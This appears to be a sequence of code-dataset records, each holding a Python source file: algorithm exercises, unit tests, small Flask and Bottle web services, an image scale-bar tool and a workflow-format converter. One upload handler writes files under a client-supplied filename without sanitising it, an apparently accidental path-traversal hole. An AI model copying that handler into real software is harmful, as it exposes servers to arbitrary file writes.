(k, v) in enumerate(self.sensor_dict.items()) if v == 1]]\n\n\ndef set_graph_options(low_, high_):\n global low\n global high\n\n low = low_\n high = high_\n\n\n\n\n\n\ndef get_stop_situation():\n return extract.stop_listener\n\n\ndef get_data_folder():\n return extract.data_folder_path\n\n\ndef get_pattern():\n return extract.pattern\n\n\nif __name__ == \"__main__\":\n print(\"Start\")\n print(get_data_folder())\n #Receiver = Receiver(\"a\", \"b\", \"c\", \"d\")\n #Receiver.set_using_sensor(\"a\", \"c\")\n # extract.set_data([1, 2, 3])\n # extract.set_extract_options(pattern_name=\"foward\")\n # print(path, pattern, beep1, beep2, elapsed, start_index)\n\n\"\"\"\n stop_receive = get_stop_situation()\n while not stop_receive:\n Receiver.receive()\n with extract.Listener(on_press=extract.on_press) as listener:\n while not extract.stop_listener:\n listener.join()\n stop_receive = get_stop_situation()\n\n print(\"Program Done...\")\n\"\"\"\n\n\n","sub_path":"2019E2Festa/receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"205082215","text":"# 637. Average of Levels in Binary Tree\n\n# Given a non-empty binary tree, return the average value of the nodes on each level in the form of an array.\n# Example 1:\n# Input:\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# Output: [3, 14.5, 11]\n# Explanation:\n# The average value of nodes on level 0 is 3, on level 1 is 14.5, and on level 2 is 11. Hence return [3, 14.5, 11].\n# Note:\n# The range of node's value is in the range of 32-bit signed integer.\n\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass AverageOfLevels:\n def doit(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[float]\n \"\"\"\n buff = [root]\n res = []\n while buff:\n total = 0\n N = len(buff)\n newBuff = []\n for c in buff:\n total += c.val\n if c.left:\n newBuff.append(c.left)\n if c.right:\n newBuff.append(c.right)\n\n res.append(total / N)\n buff = newBuff\n\n return res\n\n\n def doit(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[float]\n \"\"\"\n if not root:\n return []\n my_list = []\n stack = []\n stack.append(root)\n while stack:\n temp_list = []\n temp_stack = []\n\n for i in stack:\n\n temp_list.append(i.val)\n\n if i.left:\n temp_stack.append(i.left)\n if i.right:\n temp_stack.append(i.right)\n\n if temp_list:\n my_list.append(sum(temp_list)/len(temp_list))\n\n stack = temp_stack\n\n return my_list\n\n\n\nif __name__ == \"__main__\":\n\n root = TreeNode(3)\n\n root.left = TreeNode(9)\n root.right = TreeNode(20)\n\n root.right.left = TreeNode(15)\n root.right.right = TreeNode(7)\n\n res = AverageOfLevels().doit(root)\n","sub_path":"PythonLeetcode/LeetCodeE/637_AverageOfLevelsInBinaryTree.py","file_name":"637_AverageOfLevelsInBinaryTree.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"173365931","text":"import random\nimport unittest\nfrom mock import Mock, patch\nfrom genetics import Genome, Population, fitness_function\n\n\ndef fake_randint(a, b):\n return 0\n\n\nclass TestGenome(unittest.TestCase):\n def setUp(self):\n self.genomeA = Genome([1, 2, 3, 4, 5, 6, 7, 8])\n self.genomeB = Genome([8, 7, 6, 5, 4, 3, 2, 1])\n\n def test_mate(self):\n child = self.genomeA.mate(self.genomeB)\n expected_child = Genome([1, 2, 3, 4, 4, 3, 2, 1])\n self.assertEqual(child, expected_child)\n\n @patch('random.randint', fake_randint)\n def test_mutate(self):\n expected_mutant = Genome([2, 2, 3, 4, 5, 6, 7, 8])\n self.genomeA.mutate()\n self.assertEqual(self.genomeA, expected_mutant, str(self.genomeA))\n\n\nclass TestPopulation(unittest.TestCase):\n def test_init_with_no_parameters(self):\n random_population = Population()\n self.assertEqual(random_population.size(), 50)\n\n def test_get_fittest_pair(self):\n population = Population(\n members=[Genome([1, 2, 3, 4, 5, 6, 7, 8]),\n Genome([8, 7, 6, 5, 4, 3, 2, 1]),\n Genome([4, 3, 2, 1, 8, 7, 6, 5])])\n fittest_pair = population.get_fittest_pair(self._fitness_function)\n expected_fittest_pair = (\n Genome([8, 7, 6, 5, 4, 3, 2, 1]),\n Genome([4, 3, 2, 1, 8, 7, 6, 5]))\n self.assertEqual(fittest_pair, expected_fittest_pair)\n\n def _fitness_function(self, genome):\n return genome.solution[0]\n\n\nclass TestFitnessFunction(unittest.TestCase):\n def test_all_same(self):\n genome = Genome([1, 1, 1, 1, 1, 1, 1, 1])\n expected_fitness = -28\n fitness = fitness_function(genome)\n self.assertEqual(fitness, expected_fitness)\n\n def test_one_pair(self):\n genome = Genome([1, 1, 3, 5, 7, 2, 4, 6])\n expected_fitness = -1\n fitness = fitness_function(genome)\n self.assertEqual(fitness, expected_fitness)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"148989421","text":"# %load q03_t_test/build.py\n# Default imports\nimport scipy.stats as stats\nimport pandas as pd,numpy as np\n\ndf = pd.read_csv('data/house_pricing.csv')\n\n\n# Enter Code Here\ndef t_statistic(df):\n t_stat, p_value =stats.ttest_1samp(a= df[df['Neighborhood'] == 'OldTown']['GrLivArea'], # Sample data\n popmean= df['GrLivArea'].mean())\n \n p_crit = stats.norm.ppf(q=0.90)\n if(p_value 1):\n\tprint(\"\\033[91m{}\\033[00m\" .format(\"Error! Multiple matches from filtering criteria.\"), file=sys.stderr)\n\tsys.exit(2)\n\n# Input image\nimg = Image.open(input_image).convert(\"RGB\")\nexif = img.info['exif']\nicc_profile = img.info.get('icc_profile')\n\n# Read width and height from image\nwidth, height = img.size\n\n# Scale of one pixel\nscale_pixel = (height / entry.ImageHeight) * (entry.PixelDistance / entry.Scale)\n\n# Width of scale bar\nif (scale_multiplier == 0):\n\tscale_width = round(scale_pixel * entry.Scale * (entry.ImageHeight / height), 0)\nelif (scale_multiplier == 1):\n\tscale_width = round(scale_pixel * entry.Scale, 0)\nelse:\n\tscale_width = round(scale_pixel * entry.Scale * scale_multiplier, 0)\n\n# Height of scale bar\nscale_height = round((height) / (entry.ImageHeight / 100), 0)\n\n# Label beside the scale base\nscale_label = (' ' + entry.Scale.to_string(index=False) + ' ' + entry.Unit.to_string(index=False) + ' ')\n\n# Define font\nif (scale_type == 1):\n\tscale_font_size = int(round(scale_height * 1.8, 0))\n\tscale_font = ImageFont.truetype(\"Arial Bold\", scale_font_size)\n\tscale_label_width, scale_label_height = scale_font.getsize(scale_label)\nelse:\n\tscale_height = round(scale_height / 6, 0)\n\tscale_font_size = int(round(height / 25, 0))\n\tscale_font = ImageFont.truetype(\"Arial Bold\", scale_font_size)\n\tscale_label_width, scale_label_height = scale_font.getsize(scale_label)\n\n# Coordinates of scale bar\nif (scale_type == 1):\n\tscale_bar_x1 = (width - scale_width - scale_label_width)\n\tscale_bar_y1 = height - scale_height - scale_font.getsize(' ')[0]\n\tscale_bar_x2 = scale_bar_x1 + scale_width\n\tscale_bar_y2 = scale_bar_y1 + scale_height\n\tscale_bar_y3 = scale_bar_y1 - ((scale_label_height - (scale_bar_y2 - scale_bar_y1)) / 2)\nelse:\n\tscale_bar_x1 = (width - scale_width) - round(width / 33, 0)\n\tscale_bar_y1 = height - scale_height - round(height / 33, 0) - scale_font.getsize(' ')[0]\n\tscale_bar_x2 = scale_bar_x1 + scale_width\n\tscale_bar_y2 = scale_bar_y1 + scale_height\n\tscale_bar_x4 = scale_bar_x1 + (scale_width / 2) - (scale_label_width / 2.5)\n\tscale_bar_y4 = scale_bar_y2 + scale_height\n\n# Type 1: Draw box and label beside it\nif (scale_type == 1):\n\tdraw = ImageDraw.Draw(img)\n\tdraw.rectangle( ((scale_bar_x1, scale_bar_y1), (scale_bar_x2, scale_bar_y2)), fill=\"black\")\n\tdraw.text((scale_bar_x2, scale_bar_y3), scale_label, font=scale_font, fill=\"black\")\nelse:\n\tadj = round(height / 600, 1)\n\tdraw = ImageDraw.Draw(img)\n\tdraw.rectangle( ((scale_bar_x1, scale_bar_y1), (scale_bar_x2, scale_bar_y2)), fill=\"black\")\n\tdraw.rectangle( ((scale_bar_x1, scale_bar_y1-(adj*3)), (scale_bar_x1+(adj*2), scale_bar_y2+(adj*3))), fill=\"black\")\n\tdraw.rectangle( ((scale_bar_x2-(adj*2), scale_bar_y1-(adj*3)), (scale_bar_x2, scale_bar_y2+(adj*3))), fill=\"black\")\n\tdraw.text((scale_bar_x4-adj, scale_bar_y4), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4+adj, scale_bar_y4), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4, scale_bar_y4-adj), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4, scale_bar_y4+adj), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4-adj, scale_bar_y4+adj), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4+adj, scale_bar_y4-adj), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4-adj, scale_bar_y4-adj), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4+adj, scale_bar_y4+adj), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4, scale_bar_y4), scale_label, font=scale_font, fill=\"white\")\n\n# Save output image\nimg.save(output_image, format='JPEG', quality=jpeg_quality, optimize=True, progressive=True, exif=exif, icc_profile=icc_profile)\n\nprint(\"Done.\")\n","sub_path":"scale_bar.py","file_name":"scale_bar.py","file_ext":"py","file_size_in_byte":7538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"144330402","text":"#!/usr/bin/env python\n\nimport flask_or_bottle, os, sys, webbrowser\n\napp = flask_or_bottle.app\n\n@app.route('/')\ndef hello():\n return '

Hello World!

' + flask_or_bottle.footer\n\nif __name__ == '__main__':\n if sys.platform == 'darwin':\n webbrowser.open('http://127.0.0.1:5000')\n app.run(debug=True, port=5000) # if on Mac OSX\n else:\n port = os.getenv('VCAP_APP_PORT', '5000')\n app.run(host='0.0.0.0', port=int(port))\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"380089061","text":"#MIT License\n#\n#Copyright (c) 2017 Juan J. Durillo\n#\n#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n#\n#The above copyright notice and this permission notice shall be included in all\n#copies or substantial portions of the Software.\n#\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n#SOFTWARE.\n\nimport sys\nimport os\nimport xml.etree.ElementTree as ET\nimport collections\nfrom xml.dom import minidom\nimport ntpath\n\n\ndef buildFilesDictionary(files):\n files_dictionary = {}\n # a file has a single element pfn with the url of the file\n for file in files:\n files_dictionary[file.attrib['name']] = file[0].attrib['url']\n\n return files_dictionary\n####buildFilesDictionary\n\ndef buildExecutablesDictionary(executables):\n executables_dictionary = {}\n # a executable has a single element pfn with the url of the file\n for executable in executables:\n executables_dictionary[executable.attrib['name']] = executable[0].attrib['url']\n\n return executables_dictionary\n####buildExecutablesDictionary\n\n\ndef buildJobsDictionary(jobs,dependencies):\n jobs_dictionary = collections.OrderedDict()\n for job in jobs:\n jobs_dictionary[job.attrib['id']] = {}\n # obtaining executable\n jobs_dictionary[job.attrib['id']]['executable'] = job.attrib['name']\n # obtaining arguments\n jobs_dictionary[job.attrib['id']]['arguments'] = []\n argument = job.find('{http://pegasus.isi.edu/schema/DAX}argument')\n #print(job.attrib['id'])\n if argument is not None:\n sub_files = argument.findall('{http://pegasus.isi.edu/schema/DAX}file')\n if len(sub_files) == 0:\n # this is a hardcoded argument\n jobs_dictionary[job.attrib['id']]['arguments'].append(argument.text)\n else:\n i = 0\n for text in argument.itertext():\n #print(text)\n if i < len(sub_files):\n jobs_dictionary[job.attrib['id']]['arguments'].append(([text,sub_files[i].attrib['name']]))\n i = i + 1\n else:\n jobs_dictionary[job.attrib['id']]['arguments'].append((text))\n #print(jobs_dictionary[job.attrib['id']]['arguments'])\n\n\n\n\n # processing inputs and outputs\n jobs_dictionary[job.attrib['id']]['inputs'] = []\n jobs_dictionary[job.attrib['id']]['outputs'] = []\n\n\n uses = job.findall('{http://pegasus.isi.edu/schema/DAX}uses')\n for use in uses:\n if use.attrib['link'] == \"input\":\n jobs_dictionary[job.attrib['id']]['inputs'].append(use.attrib['name'])\n else:\n jobs_dictionary[job.attrib['id']]['outputs'].append(use.attrib['name'])\n\n jobs_dictionary[job.attrib['id']]['depends'] = []\n jobs_dictionary[job.attrib['id']]['unmetDependencies'] = []\n jobs_dictionary[job.attrib['id']]['parent'] = []\n jobs_dictionary[job.attrib['id']]['executed'] = False\n\n #adding dependencies\n for dependence in dependencies:\n parents = dependence.findall('{http://pegasus.isi.edu/schema/DAX}parent')\n for parent in parents:\n jobs_dictionary[dependence.attrib['ref']]['depends'].append(parent.attrib['ref'])\n jobs_dictionary[dependence.attrib['ref']]['unmetDependencies'].append(parent.attrib['ref'])\n jobs_dictionary[parent.attrib['ref']]['parent'].append(dependence.attrib['ref'])\n\n\n return jobs_dictionary\n####buildJobsDictionary\n\ndef createBaseXML():\n return ET.Element('cgwd',attrib={'author':'parser', 'domain' : '', 'name' : 'parser-workflow', 'version':''})\n####createBaseXML\n\ndef addWorkflowInputs(agwl_format,files_dictionary):\n workflow_inputs = ET.SubElement(agwl_format,'cgwdInput')\n for file in files_dictionary:\n dataIn =ET.SubElement(workflow_inputs,'dataIn')\n dataIn.attrib={'category':'Data', 'name':file, 'source':files_dictionary[file],'type':'agwl:file'}\n dataRepresentation = ET.SubElement(dataIn,'dataRepresentation')\n\n storageType = ET.SubElement(dataRepresentation,'storageType')\n storageType.text= 'FileSystem'\n contentType = ET.SubElement(dataRepresentation,'contentType')\n contentType.text='File'\n archiveType = ET.SubElement(dataRepresentation,'archiveType')\n archiveType.text='none'\n cardinality = ET.SubElement(dataRepresentation,'cardinality')\n cardinality.text='single'\n return agwl_format\n####addWorkflowInputs\n\ndef readyToExecuteJobs(jobs_dictionary):\n independent_jobs = []\n for job in jobs_dictionary:\n if len(jobs_dictionary[job]['unmetDependencies']) == 0 and jobs_dictionary[job]['executed'] == False:\n independent_jobs.append(job)\n return independent_jobs\n####readyToExecuteJobs\n\n\n\nif __name__ == \"__main__\":\n\n ## Checking correct number of arguments\n if len(sys.argv) < 2:\n print(\"Usage dax2agwl [file.dax]\")\n sys.exit()\n\n\n daxFile=sys.argv[1]\n # Checks the input file exists\n if not os.path.exists(daxFile):\n print(\"File \"+daxFile+\" not found\")\n sys.exit()\n\n # Obtaining the root of the xml representing the workflow in dax format\n root = ET.parse(daxFile).getroot()\n\n files_dictionary = buildFilesDictionary(root.findall('{http://pegasus.isi.edu/schema/DAX}file'))\n executables_dictionary = buildExecutablesDictionary(root.findall('{http://pegasus.isi.edu/schema/DAX}executable'))\n jobs_dictionary = buildJobsDictionary(root.findall('{http://pegasus.isi.edu/schema/DAX}job'),root.findall('{http://pegasus.isi.edu/schema/DAX}child'))\n\n # Create an empty agwl workflow\n agwl_format = createBaseXML()\n\n #add inputs to a given workflow, based on the files_dictionary\n agwl_format = addWorkflowInputs(agwl_format,files_dictionary)\n\n # getting the tasks to be executed\n body = ET.SubElement(agwl_format,'cgwdBody')\n\n\n\n independent_jobs = readyToExecuteJobs(jobs_dictionary)\n fork_counter = 1\n while len(independent_jobs) > 0 :\n\n parallel_mode = False\n if len(independent_jobs) > 1:\n parallel_mode = True\n\n\n parallelBody = None\n if parallel_mode:\n parallel = ET.SubElement(body,'parallel')\n parallel.attrib={'name':'ForkNode_'+str(fork_counter)}\n parallelBody = ET.SubElement(parallel,'parallelBody')\n fork_counter = fork_counter + 1\n\n while len(independent_jobs) > 0 :\n job = independent_jobs[0]\n independent_jobs.remove(job)\n\n element = body\n if parallel_mode:\n section = ET.SubElement(parallelBody,'section')\n element = section\n\n activity = ET.SubElement(element,'activity')\n activity.attrib = {'function':'Function','name':job,'type':'soy:'+job}\n\n # inputs are based on dependencies\n dataIns = ET.SubElement(activity,'dataIns')\n for input_file in jobs_dictionary[job]['inputs']:\n dataIn = ET.SubElement(dataIns,'dataIn')\n if input_file in files_dictionary:\n dataIn.attrib={'category':'Data','name':input_file,'source':'parser-workflow'+'/'+input_file,'type':'agwl:file'}\n else:\n for parent in jobs_dictionary[job]['depends'] :\n if input_file in jobs_dictionary[parent]['outputs']:\n dataIn.attrib={'category':'Data','name':input_file,'source':parent+'/' +input_file,'type':'agwl:file'}\n break\n\n dataRepresentation = ET.SubElement(dataIn,'dataRepresentation')\n storageType = ET.SubElement(dataRepresentation,'storageType')\n storageType.text= 'FileSystem'\n contentType = ET.SubElement(dataRepresentation,'contentType')\n contentType.text='File'\n archiveType = ET.SubElement(dataRepresentation,'archiveType')\n archiveType.text='none'\n cardinality = ET.SubElement(dataRepresentation,'cardinality')\n cardinality.text='single'\n\n #outputs of the task\n dataOuts = ET.SubElement(activity,'dataOuts')\n\n for output_file in jobs_dictionary[job]['outputs']:\n dataOut = ET.SubElement(dataOuts,'dataOut')\n dataOut.attrib = {'category':'', 'name':output_file,'saveto':'', 'type':'agwl:file'}\n dataRepresentation = ET.SubElement(dataOut,'dataRepresentation')\n storageType = ET.SubElement(dataRepresentation,'storageType')\n storageType.text= 'FileSystem'\n contentType = ET.SubElement(dataRepresentation,'contentType')\n contentType.text='File'\n archiveType = ET.SubElement(dataRepresentation,'archiveType')\n archiveType.text='none'\n cardinality = ET.SubElement(dataRepresentation,'cardinality')\n cardinality.text='single'\n\n jobs_dictionary[job]['executed'] = True\n\n for child in jobs_dictionary[job]['parent']:\n jobs_dictionary[child]['unmetDependencies'].remove(job)\n\n\n\n independent_jobs = readyToExecuteJobs(jobs_dictionary)\n\n last_activity = jobs_dictionary.keys()[-1]\n workflow_output = ET.SubElement(agwl_format,'cgwdOutput')\n for output_file in jobs_dictionary[last_activity]['outputs']:\n dataOut = ET.SubElement(workflow_output,'dataOut')\n dataOut.attrib = {'category':'', 'name':output_file,'saveto':'', 'source':last_activity+'/'+output_file,'type':'agwl:file'}\n dataRepresentation = ET.SubElement(dataOut,'dataRepresentation')\n storageType = ET.SubElement(dataRepresentation,'storageType')\n storageType.text= 'FileSystem'\n contentType = ET.SubElement(dataRepresentation,'contentType')\n contentType.text='File'\n archiveType = ET.SubElement(dataRepresentation,'archiveType')\n archiveType.text='none'\n cardinality = ET.SubElement(dataRepresentation,'cardinality')\n cardinality.text='single'\n\n\n\n rough_string = ET.tostring(agwl_format, 'utf-8')\n reparsed = minidom.parseString(rough_string)\n print(reparsed.toprettyxml(indent=\" \"))\n\n\n","sub_path":"dax2agwl.py","file_name":"dax2agwl.py","file_ext":"py","file_size_in_byte":11158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"100853873","text":"import io\nfrom flask import Flask, request, jsonify\nfrom flask_cors import cross_origin\nfrom hrmcompiler.jsonassembler import Assembler\nfrom hrmcompiler import calculate_optimized_ast\nfrom collections import namedtuple\n\napp = Flask(__name__)\n\nCompilerArgs = namedtuple(\"CompilerArgs\", [\n \"no_jump_compression\",\n \"no_unreachable\",\n \"no_jmp_then_label\",\n])\n\n\n@app.route(\"/build\", methods=[\"POST\"])\n@cross_origin()\ndef build():\n # data = request.get_data().decode(\"utf-8\")\n data = request.get_json(force=True)\n # print(\"/build\", data)\n args = CompilerArgs(False, False, False)\n ast = calculate_optimized_ast(io.StringIO(data[\"code\"]), args)\n a = Assembler()\n a.convert(ast)\n # print(\"converted: \", a.code)\n return jsonify({\"code\": a.code})\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"561239104","text":"#!/usr/bin/env python\n#_*_coding:utf-8_*_\n\nimport os\nfrom dao import models\nfrom dao import ormdjango as orm\n\ndef fabu(request,u):\n ret = {\"status\":True,\"message\":\"\"}\n title = request.POST.get(\"title\", None)\n summary = request.POST.get(\"summary\", None)\n content = request.POST.get(\"content\", None)\n file = request.FILES.get(\"file\", None)\n print(all([title, summary, content, file]))\n if all([title, summary, content, file]):\n\n PATH = os.path.join(\"web/statics/img/upload/\", file.name)\n f = open(PATH, \"wb\")\n for chunk in file.chunks():\n f.write(chunk)\n print(title, summary, content, file,u)\n file = \"/statics/img/upload/%s\" % file.name\n x = orm.publish(title,summary,content,file,u)\n print(x)\n if not x[\"status\"]:\n ret['status'] = False\n ret['message'] = \"发布文章到数据库时候服务器出错,联系管理员%s\" % x['message']\n else:\n ret['status'] =False\n ret['message'] = \"有内容为空请返回重新提交\"\n\n return ret","sub_path":"service/manage/pubartichle.py","file_name":"pubartichle.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"549292987","text":"from datetime import datetime\nimport json\n\nfrom bottle import get, post, put, delete, request\n\nfrom shapely.geometry import Point\nfrom geoalchemy import WKTSpatialElement\n\nimport phi.core.model as model\nimport phi.core.repository as repo\n\nfrom phi.rest import rest_method, db_session\nimport phi.rest.vo as vo\n\n\n@get('workspace/getbyowner')\n@rest_method\ndef get_by_owner():\n\tuser_name = request.GET.get('userName')\n\tstart = int(request.GET.get('start'))\n\tlimit = int(request.GET.get('limit'))\n\t\n\tworkspaces = repo.Workspace(db_session).get_by_owner(user_name)\n\t#paging by code (discrete values)\n\ttotal = len(workspaces)\n\tlimit = start + limit\n\t\n\t#order by date\n\tsort_ws = sorted(workspaces, key=lambda n: n.date, reverse=True)\n\t\n\to = map(lambda ws: vo.workspace(ws), sort_ws[start:limit])\n\treturn vo.collection(o, total)\n\n#CRUD\n@post('workspace')\n@rest_method\ndef create():\n\to = json.load(request.body)\n\tuser_name = o['userName']\n\tname = o['name']\n\tdescription = o['description']\n\tlayers = o['layers']\n\tpoint = o['point']\n\toverlays = o['overlays']\n\tbaselayer = o['baselayer']\n\tuser_name = o['userName']\n\n\tws = model.Workspace()\n\tws.name = name\n\tws.description = description\n\tws.layers = layers\n\tws.overlays = overlays\n\tws.baselayer = baselayer\n\tws.user_name = user_name\n\tws.point = WKTSpatialElement(Point(point['x'], point['y']).wkt,96)\n\tws.public = True\n\tws.date = datetime.now()\n\t\n\trepo.Workspace(db_session).create_update(ws)\n\n\trepo_user = repo.User(db_session)\n\tuser = repo_user.read(user_name)\n\tuser.workspaces.append(ws)\n\trepo_user.create_update(user)\n\treturn vo.success(True)\n\n@get('workspace/:id')\n@rest_method\ndef read(id):\n\tws = repo.Workspace(db_session).read(id)\n\to = vo.workspace(ws) if ws else ''\n\treturn o\n\n@put('workspace')\n@rest_method\ndef update():\n\to = json.load(request.body)\n\tid = o['id']\n\tname = o['name']\n\tdescription = o['description']\n\tlayers = o['layers']\n\tpoint = o['point']\n\toverlays = o['overlays']\n\tbaselayer = o['baselayer']\n\n\trepo_ws = repo.Workspace(db_session)\n\tws = repo_ws.read(id)\n\t\n\tws.name = name\n\tws.description = description\n\tws.layers = layers\n\tws.overlays = overlays\n\tws.baselayer = baselayer\n\tws.point = WKTSpatialElement(Point(point['x'], point['y']).wkt,96)\n\tws.public = True\n\tws.date = datetime.now()\n\t\n\trepo_ws.create_update(ws)\n\treturn vo.success(True)\n\n@delete('workspace/:id')\n@rest_method\ndef delete(id):\n\trepo_ws= repo.Workspace(db_session)\n\tws = repo_ws.read(id)\n\trepo_ws.delete(ws)\n\treturn vo.success(True)\n\n\n@get('workspace/getusers')\n@rest_method\ndef get_users():\n\tid = int(request.GET.get('id'))\n\tstart = int(request.GET.get('start'))\n\tlimit = int(request.GET.get('limit'))\n\n\tworkspace = repo.Workspace(db_session).read(id)\n\tusers = workspace.users\n\t\n\t#paging by code (discrete values)\n\ttotal = len(users)\n\tlimit = start + limit\n\n\to = map(lambda u: vo.user(u), users[start:limit])\n\treturn vo.collection(o, total)\n\t\n\n@post('workspace/addusers')\n@rest_method\ndef add_users():\n\to = json.load(request.body)\n\tid = o[\"id\"]\n\tuser_names = o[\"userNames\"]\n\n\trepo_workspace = repo.Workspace(db_session)\n\trepo_user = repo.User(db_session)\n\n\tworkspace = repo_workspace.read(id)\n\n\tdef add(user_name):\n\t\tu = repo_user.read(user_name)\n\t\tworkspace.users.append(u)\n\t\treturn True\n\n\tmap(lambda user_name: add(user_name), user_names)\n\t\n\trepo_workspace.create_update(workspace)\n\treturn vo.action(True)\n\n@post('workspace/removeusers')\n@rest_method\ndef remove_users():\n\to = json.load(request.body)\n\tid = o[\"id\"]\n\tuser_names = o[\"userNames\"]\n\n\trepo_workspace = repo.Workspace(db_session)\n\trepo_user = repo.User(db_session)\n\n\tworkspace = repo_workspace.read(id)\n\n\tdef remove(user_name):\n\t\tu = repo_user.read(user_name)\n\t\tif(u in workspace.users):\n\t\t\tworkspace.users.remove(u)\n\t\treturn True\n\n\tmap(lambda user_name: remove(user_name), user_names)\n\n\trepo_workspace.create_update(workspace)\n\treturn vo.action(True)","sub_path":"src/server/lib/phi/rest/workspace.py","file_name":"workspace.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"445755703","text":"\"\"\"\nBinary search\n\nReferences:\n- https://en.wikipedia.org/wiki/Binary_search_algorithm\n\"\"\"\n\n\ndef binary_search(arr, target):\n \"\"\"\n arr must be sorted, O(nlogn)\n given an array and a target value, return the index\n returns -1 if the target is not present\n\n Best case: O(1)\n Worst case: O(log n)\n Worst case space: O(1)\n \"\"\"\n low = 0\n high = len(arr) - 1\n while low <= high:\n mid = (low + high) // 2\n if target > arr[mid]:\n low = mid + 1\n elif target < arr[mid]:\n high = mid - 1\n else:\n return mid\n return -1\n\n # replace with this line for nearest\n # return low if arr[low] - target < target - arr[high] else high\n\n\ndef binary_search_recur(arr, low, high, num):\n \"\"\"\n recursive variant of binary search\n \"\"\"\n if low > high: # error case\n return -1\n mid = (low + high) // 2\n if num < arr[mid]:\n return binary_search_recur(arr, low, mid - 1, num)\n if num > arr[mid]:\n return binary_search_recur(arr, mid + 1, high, num)\n return mid\n\n\ndef test():\n \"\"\"run test cases\"\"\"\n tests = (\n ([1, 2, 4, 7, 9, 11], 5, -1),\n ([3, 5, 7, 8, 9, 10], 3, 0),\n ([1, 5, 8, 10], 0, -1),\n ([1, 5, 8, 10], 5, 1),\n )\n for *args, result in tests:\n assert binary_search(*args) == result\n\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"dsa/search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"560502609","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport tkinter as tk\n\n\nclass GameOfLife(tk.Tk):\n def __init__(self, parent):\n tk.Tk.__init__(self, parent)\n self.parent = parent\n self.geometry(\"800x600+100+100\")\n self.title(\"Conway's Game Of Life\")\n self.size = 80\n self.cell_sz = 5\n self.colors = {0: \"#1f2433\", 1: \"#2ab922\"}\n self.grid = [[0 for i in range(self.size)] for i in range(self.size)]\n self.generation_nb = tk.IntVar(0)\n self.initUi()\n self.cells = self.initCells()\n self.animation_on = False\n self.can.bind(\"\", self.click)\n self.can.bind(\"\", self.move)\n self.can.bind(\"\", self.can.delete(\"preview\"))\n self.bind(\"\", self.toggleAnimation_space)\n\n def initUi(self):\n # Canvas\n self.can_fr = tk.Frame(self, height=400)\n self.can_fr.grid(row=0, column=0)\n\n self.can = tk.Canvas(\n self.can_fr, width=400, height=400, bg=self.colors[0])\n self.can.grid()\n\n # Generation number display\n self.data_fr = tk.Frame(self, height=100, padx=20, pady=20)\n self.data_fr.grid(row=1, column=0)\n\n self.generation_nb_ent = tk.Entry(\n self.data_fr,\n textvariable=self.generation_nb,\n width=6,\n state=tk.DISABLED,\n bg=\"white\")\n self.generation_nb_ent.grid(row=0, column=0)\n\n # Commands : play/pause, step, clear\n self.cmd_fr = tk.Frame(self, height=100)\n self.cmd_fr.grid(row=2, column=0)\n\n self.bt_clear = tk.Button(\n self.cmd_fr, text=\"Clear\", command=self.clear)\n self.bt_clear.grid(row=0, column=0)\n\n self.bt_play = tk.Button(\n self.cmd_fr, text=\"Play\", command=self.toggleAnimation_button)\n self.bt_play.grid(row=0, column=1)\n\n self.bt_step = tk.Button(self.cmd_fr, text=\"Step +1\", command=self.step)\n self.bt_step.grid(row=0, column=2)\n\n def initCells(self):\n cells = []\n for 